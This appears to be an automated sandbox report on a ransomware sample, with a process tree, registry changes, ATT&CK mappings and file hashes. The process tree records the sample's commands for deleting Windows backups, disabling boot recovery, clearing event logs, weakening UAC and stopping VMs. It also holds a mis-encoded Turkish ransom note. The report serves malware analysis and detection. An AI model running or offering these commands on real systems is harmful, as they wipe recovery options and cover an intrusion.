description pid Process Token: SeIncreaseQuotaPrivilege 4912 freeworldencrypting.exe Token: SeSecurityPrivilege 4912 freeworldencrypting.exe Token: SeTakeOwnershipPrivilege 4912 freeworldencrypting.exe Token: SeLoadDriverPrivilege 4912 freeworldencrypting.exe Token: SeSystemProfilePrivilege 4912 freeworldencrypting.exe Token: SeSystemtimePrivilege 4912 freeworldencrypting.exe Token: SeProfSingleProcessPrivilege 4912 freeworldencrypting.exe Token: SeIncBasePriorityPrivilege 4912 freeworldencrypting.exe Token: SeCreatePagefilePrivilege 4912 freeworldencrypting.exe Token: SeBackupPrivilege 4912 freeworldencrypting.exe Token: SeRestorePrivilege 4912 freeworldencrypting.exe Token: SeShutdownPrivilege 4912 freeworldencrypting.exe Token: SeDebugPrivilege 4912 freeworldencrypting.exe Token: SeSystemEnvironmentPrivilege 4912 freeworldencrypting.exe Token: SeChangeNotifyPrivilege 4912 freeworldencrypting.exe Token: SeRemoteShutdownPrivilege 4912 freeworldencrypting.exe Token: SeUndockPrivilege 4912 freeworldencrypting.exe Token: SeManageVolumePrivilege 4912 freeworldencrypting.exe Token: SeImpersonatePrivilege 4912 freeworldencrypting.exe Token: SeCreateGlobalPrivilege 4912 freeworldencrypting.exe Token: 33 4912 freeworldencrypting.exe Token: 34 4912 freeworldencrypting.exe Token: 35 4912 freeworldencrypting.exe Token: 36 4912 freeworldencrypting.exe Token: SeIncreaseQuotaPrivilege 924 freeworldencrypting.exe Token: SeSecurityPrivilege 924 freeworldencrypting.exe Token: SeTakeOwnershipPrivilege 924 freeworldencrypting.exe Token: SeLoadDriverPrivilege 924 freeworldencrypting.exe Token: SeSystemProfilePrivilege 924 freeworldencrypting.exe Token: SeSystemtimePrivilege 924 freeworldencrypting.exe Token: SeProfSingleProcessPrivilege 924 freeworldencrypting.exe Token: SeIncBasePriorityPrivilege 924 freeworldencrypting.exe Token: SeCreatePagefilePrivilege 924 freeworldencrypting.exe Token: SeBackupPrivilege 924 freeworldencrypting.exe Token: SeRestorePrivilege 924 freeworldencrypting.exe Token: SeShutdownPrivilege 924 freeworldencrypting.exe Token: SeDebugPrivilege 924 freeworldencrypting.exe Token: SeSystemEnvironmentPrivilege 924 freeworldencrypting.exe Token: SeChangeNotifyPrivilege 924 freeworldencrypting.exe Token: SeRemoteShutdownPrivilege 924 freeworldencrypting.exe Token: SeUndockPrivilege 924 freeworldencrypting.exe Token: SeManageVolumePrivilege 924 freeworldencrypting.exe Token: SeImpersonatePrivilege 924 freeworldencrypting.exe Token: SeCreateGlobalPrivilege 924 freeworldencrypting.exe Token: 33 924 freeworldencrypting.exe Token: 34 924 freeworldencrypting.exe Token: 35 924 freeworldencrypting.exe Token: 36 924 freeworldencrypting.exe Token: SeIncreaseQuotaPrivilege 2144 freeworldencrypting.exe Token: SeSecurityPrivilege 2144 freeworldencrypting.exe Token: SeTakeOwnershipPrivilege 2144 freeworldencrypting.exe Token: SeLoadDriverPrivilege 2144 freeworldencrypting.exe Token: SeSystemProfilePrivilege 2144 freeworldencrypting.exe Token: SeSystemtimePrivilege 2144 freeworldencrypting.exe Token: SeProfSingleProcessPrivilege 2144 freeworldencrypting.exe Token: SeIncBasePriorityPrivilege 2144 freeworldencrypting.exe Token: SeCreatePagefilePrivilege 2144 freeworldencrypting.exe Token: SeBackupPrivilege 2144 freeworldencrypting.exe Token: SeRestorePrivilege 2144 freeworldencrypting.exe Token: SeShutdownPrivilege 2144 freeworldencrypting.exe Token: SeDebugPrivilege 2144 freeworldencrypting.exe Token: SeSystemEnvironmentPrivilege 2144 freeworldencrypting.exe Token: SeChangeNotifyPrivilege 2144 freeworldencrypting.exe Token: SeRemoteShutdownPrivilege 2144 freeworldencrypting.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 892 Everything.exe 4260 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4912 wrote to memory of 924 4912 freeworldencrypting.exe 82 PID 4912 wrote to memory of 924 4912 freeworldencrypting.exe 82 PID 4912 wrote to memory of 924 4912 freeworldencrypting.exe 82 PID 924 wrote to memory of 3132 924 freeworldencrypting.exe 83 PID 924 wrote to memory of 3132 924 freeworldencrypting.exe 83 PID 924 wrote to memory of 3132 924 freeworldencrypting.exe 83 PID 924 wrote to memory of 2144 924 freeworldencrypting.exe 84 PID 924 wrote to memory of 2144 924 freeworldencrypting.exe 84 PID 924 wrote to memory of 2144 924 freeworldencrypting.exe 84 PID 924 wrote to memory of 3216 924 freeworldencrypting.exe 85 PID 924 wrote to memory of 3216 924 freeworldencrypting.exe 85 PID 924 wrote to memory of 3216 924 freeworldencrypting.exe 85 PID 924 wrote to memory of 3640 924 freeworldencrypting.exe 86 PID 924 wrote to memory of 3640 924 freeworldencrypting.exe 86 PID 924 wrote to memory of 3640 924 freeworldencrypting.exe 86 PID 924 wrote to memory of 892 924 freeworldencrypting.exe 88 PID 924 wrote to memory of 892 924 freeworldencrypting.exe 88 PID 924 wrote to memory of 892 924 freeworldencrypting.exe 88 PID 924 wrote to memory of 2236 924 freeworldencrypting.exe 89 PID 924 wrote to memory of 2236 924 freeworldencrypting.exe 89 PID 924 wrote to memory of 116 924 freeworldencrypting.exe 90 PID 924 wrote to memory of 116 924 freeworldencrypting.exe 90 PID 924 wrote to memory of 3524 924 freeworldencrypting.exe 91 PID 924 wrote to memory of 3524 924 freeworldencrypting.exe 91 PID 924 wrote to memory of 3888 924 freeworldencrypting.exe 92 PID 924 wrote to memory of 3888 924 freeworldencrypting.exe 92 PID 924 wrote to memory of 3768 924 freeworldencrypting.exe 93 PID 924 wrote to memory of 3768 924 freeworldencrypting.exe 93 PID 924 wrote to memory of 2448 924 freeworldencrypting.exe 94 PID 924 wrote to memory of 2448 924 freeworldencrypting.exe 94 PID 924 wrote to memory of 5076 924 freeworldencrypting.exe 95 PID 924 wrote to memory of 5076 924 freeworldencrypting.exe 95 PID 924 wrote to memory of 224 924 freeworldencrypting.exe 96 PID 924 wrote to memory of 224 924 freeworldencrypting.exe 96 PID 924 wrote to memory of 1160 924 freeworldencrypting.exe 97 PID 924 wrote to memory of 1160 924 freeworldencrypting.exe 97 PID 924 wrote to memory of 1412 924 freeworldencrypting.exe 98 PID 924 wrote to memory of 1412 924 freeworldencrypting.exe 98 PID 924 wrote to memory of 2020 924 freeworldencrypting.exe 99 PID 924 wrote to memory of 2020 924 freeworldencrypting.exe 99 PID 924 wrote to memory of 1796 924 freeworldencrypting.exe 101 PID 924 wrote to memory of 1796 924 freeworldencrypting.exe 101 PID 924 wrote to memory of 3480 924 freeworldencrypting.exe 102 PID 924 wrote to memory of 3480 924 freeworldencrypting.exe 102 PID 924 wrote to memory of 396 924 freeworldencrypting.exe 103 PID 924 wrote to memory of 396 924 freeworldencrypting.exe 103 PID 924 wrote to memory of 4676 924 freeworldencrypting.exe 104 PID 924 wrote to memory of 4676 924 freeworldencrypting.exe 104 PID 924 wrote to memory of 3616 924 freeworldencrypting.exe 106 PID 924 wrote to memory of 3616 924 freeworldencrypting.exe 106 PID 924 wrote to memory of 4988 924 freeworldencrypting.exe 107 PID 924 wrote to memory of 4988 924 freeworldencrypting.exe 107 PID 924 wrote to memory of 2300 924 freeworldencrypting.exe 108 PID 924 wrote to memory of 2300 924 freeworldencrypting.exe 108 PID 924 wrote to memory of 4144 924 freeworldencrypting.exe 149 PID 924 wrote to memory of 4144 924 freeworldencrypting.exe 149 PID 924 wrote to memory of 4272 924 freeworldencrypting.exe 150 PID 924 wrote to memory of 4272 924 freeworldencrypting.exe 150 PID 924 wrote to memory of 4380 924 freeworldencrypting.exe 151 PID 924 wrote to memory of 4380 924 freeworldencrypting.exe 151 PID 924 wrote to memory of 4812 924 freeworldencrypting.exe 154 PID 924 wrote to memory of 4812 924 freeworldencrypting.exe 154 PID 924 wrote to memory of 4260 924 freeworldencrypting.exe 160 PID 924 wrote to memory of 4260 924 freeworldencrypting.exe 160 -
System policy modification 1 TTPs 13 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" freeworldencrypting.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Sisteminizdeki bir gᅢᄐvenlik aᅢ댜먀゚ᅣᄆnᅣᄆ kullanarak sisteminizi ᅤ゚ifreledim.\nBilgilerinizi istiyorsanᅣᄆz bize ᅢᄊdeme yapmalᅣᄆsᅣᄆnᅣᄆz.\nSisteminizde kullandᅣ먀゚ᅣᄆm fidye yazᅣᄆlᅣᄆmᅣᄆ projesi tamamen ᅢᄊzel bir projedir. Kᅣᄆrᅣᄆlamaz. ᅢ대ᄊzᅢᄐlemez.\nSize yardᅣᄆmcᅣᄆ olabileceᅣ゚ini sᅢᄊyleyen kiᅤ゚iler sᅣᄆklᅣᄆkla bize gelerek sizin adᅣᄆnᅣᄆza yardᅣᄆm talebinde bulunuyorlar.\nBu durumda normalde ᅢᄊdediᅣ゚inizden daha fazla ᅢᄊdemek zorunda kalacaksᅣᄆnᅣᄆz. Doᅣ゚rudan bizimle iletiᅤ゚ime geᅢᄃmeniz durumunda ᅢᄊdeyeceᅣ゚iniz ᅢᄐcret daha dᅢ턔゚ᅢᄐk olacaktᅣᄆr.\nBize gᅢᄐvenmiyor olabilirsiniz. Ama size yardᅣᄆmcᅣᄆ olmak iᅢᄃin elimizden geleni yapᅣᄆyoruz.\n48 saat iᅢᄃerisinde verilerini aᅢ댜ᄆp sizi yardᅣᄆm ettiᅣ゚imiz bir firmaya yᅢᄊnlendirebiliriz.\nDᅢᄐnyanᅣᄆn her yerinde referanslarᅣᄆmᅣᄆzᅣᄆn olduᅣ゚unu bilmenizi isteriz.\nᅤ゙ifrelenmiᅤ゚ verileri aᅢᄃacaᅣ゚ᅣᄆz. Bu bizim iᅤ゚imiz. Para alᅣᄆyoruz ve yardᅣᄆm ediyoruz. Gᅢᄐvenlik aᅢ댜ᄆklarᅣᄆnᅣᄆzᅣᄆ kapatᅣᄆyoruz. Gᅢᄐvenliᅣ゚inizi saᅣ゚lᅣᄆyoruz ve tavsiyelerde bulunuyoruz.\nBizden satᅣᄆn alacaᅣ゚ᅣᄆnᅣᄆz ᅤ゚ey sadece verileriniz deᅣ゚ildir. aynᅣᄆ zamanda gᅢᄐvenliᅣ゚iniz\nAmacᅣᄆmᅣᄆz hacklenen sistemleri size geri dᅢᄊndᅢᄐrmek.\nAncak hizmetlerimizin karᅤ゚ᅣᄆlᅣ먀゚ᅣᄆnᅣᄆ almak istiyoruz.\nSizden istediᅣ゚imiz en ᅢᄊnemli ᅤ゚ey. Hᅣᄆzlᅣᄆ olmalᅣᄆsᅣᄆn. ᅣᄚletiᅤ゚im kurarken hᅣᄆzlᅣᄆ tepki verin ve durumu hᅣᄆzlᅣᄆ bir ᅤ゚ekilde ᅢ대ᄊzᅢᄐn. Zaman kaybetmek istemiyoruz.\nᅤ゙ifrelenmiᅤ゚ verileri aᅢᄃabildiᅣ゚imizi size kanᅣᄆtlayabiliriz.\nSizin iᅢᄃin ᅢᄊnemli olmayan .png, jpg, avi, pdf dosya uzantᅣᄆlarᅣᄆna sahip istediᅣ゚iniz ᅢᄊrnek dosyayᅣᄆ gᅢᄊnderebilirsiniz. Dosyayᅣᄆ ᅢᄃalᅣ먜゚ᅣᄆr durumda size geri gᅢᄊndereceᅣ゚iz. \nDosya limitimiz 3'tᅢᄐr. Daha fazlasᅣᄆnᅣᄆ sizin iᅢᄃin ᅢᄐcretsiz aᅢᄃamayᅣᄆz.\nVeritabanᅣᄆ dosyalarᅣᄆnᅣᄆzᅣᄆ bize gᅢᄊnderebilirsiniz. Veritabanᅣᄆ dosyanᅣᄆzᅣᄆ ᅢᄃalᅣ먜゚tᅣᄆrdᅣᄆktan sonra size istediᅣ゚iniz tablonun ekran gᅢᄊrᅢᄐntᅢᄐsᅢᄐnᅢᄐ gᅢᄊnderebiliriz.\n\nE-posta adresi: [email protected]\n\nBu Anahtarᅣᄆ Bize Gᅢᄊndereceksiniz: yltAiCdUX9ecl0T6bZvP0MYU7-MfiX-rFT6oZNn1kFU*EncryptedDATA" freeworldencrypting.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" freeworldencrypting.exe Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System freeworldencrypting.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\samples\freeworldencrypting.exe"C:\Users\Admin\AppData\Local\Temp\samples\freeworldencrypting.exe"1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"2⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:924 -
C:\Windows\SysWOW64\cmd.execmd.exe /c DC.exe /D3⤵
- System Location Discovery: System Language Discovery
PID:3132
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e watch -pid 924 -!3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e ul13⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3216
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e ul23⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3640
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe" -startup3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:892
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -H off3⤵
- Power Settings
PID:2236
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 03⤵
- Power Settings
PID:116
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 03⤵
- Power Settings
PID:3524
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 03⤵
- Power Settings
PID:3888
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 03⤵
- Power Settings
PID:3768
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 03⤵
- Power Settings
PID:2448
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 03⤵
- Power Settings
PID:5076
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 03⤵
- Power Settings
PID:224
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 03⤵
- Power Settings
PID:1160
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 03⤵
- Power Settings
PID:1412
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 03⤵
- Power Settings
PID:2020
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 03⤵
- Power Settings
PID:1796
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 03⤵
- Power Settings
PID:3480
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
- Power Settings
PID:396
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb613⤵
- Power Settings
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:4144
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:4272
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:4380
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4812
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe" -startup3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4260
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\AppData\Local\HACKLENDINIZ.txt"3⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:1004
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:1300
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:2068
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" & cd /d "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1844 -
C:\Windows\SysWOW64\PING.EXEping 127.2 -n 54⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4052
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3368
-
-
-
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:880
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4688
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3684
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4380
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4332
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4680
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2252
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5104
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1804
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:804
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:540
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5048
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4408
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD56e4a12d35893ed1115749b48393b5200
SHA1fbd8f6e92ecaf2e50dc3d0f53d21815059b1b6ba
SHA2560b3f8ab04d1c18025a671424df02b55805ae7fbc7eeefd7bdc5801264d287aa4
SHA51240c0fde7ca92b50c7664abf6d959592e7a26a8054b0f0c3d6273ffc63e1dc64a6e8c2c3af6791aa365a7ca64dd6905bd9d6670b6f68c33e59cd4adf608e6db38
-
Filesize
13.1MB
MD564b193695471270af85a73047f87ec36
SHA1de6353ce14dc5b5482d261c4f8afdeb2117c27e5
SHA256b4d0b9f369c6b49ba522c51545fcb7d2d0133321c6eedc617441c80cefd4f1f3
SHA512edbfeced7100749869e9cc934a4cf81f05ad347dc58cdf0c1c159e018041f58b18a1962d36fe90b1c33323ce3d65607a46fe95bbfa28884a35799a6cbdcefa2e
-
Filesize
27.1MB
MD529bbcfc4cf4da12cd403deeb806691cf
SHA14414c6fb81b3f3501934fe2c81db563b5dee5334
SHA2569f323e6284dec51c09ffe8d2ade136b78c30e00a06783d4ca296e2fec3a49fab
SHA512971265f344fd6ecefbbdc82fee8a22d7debf84c3132ac2a52bc542e96dfe2b70536f0c187a38bdff827a65fdb11e09a85136938744fdc721f9e0085e5f375487
-
Filesize
3KB
MD53f0813615deaad7b64e2e31bb5cd1aa2
SHA10aa7d06ccf31b480eb4ed00708b2ea429a8efe57
SHA256af6225e4b8d9987a20a07cc26125a9e6151d5ef3b6a1dccd6e5f395f1cd23861
SHA512bbe6c451bb64a6c4a1f30235c0dc982601b307c6f706f9d16507a2f8a8a321c24c79b9d649f09b5da9e3ac6eaa318ff92e17305d8916f7806ace11a2667e1fa9
-
Filesize
13.1MB
MD598af8d0d2591840fab2465d690dba3f3
SHA127cf9c367652093433547c77be1340ca34fbaebe
SHA25672156118bb1c501782cedfc96d1688b2a4065ec28dfa358d23120258446a312f
SHA512491750184afa8b9e9fc17c299923b3fb6de34d605e71b16f8a4e936c32f2fbda6d9689acf377060e2f53b0f82f98f0e07fd26adb9be3c8679c9ef894585a4c2e
-
Filesize
1.7MB
MD5c44487ce1827ce26ac4699432d15b42a
SHA18434080fad778057a50607364fee8b481f0feef8
SHA2564c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405
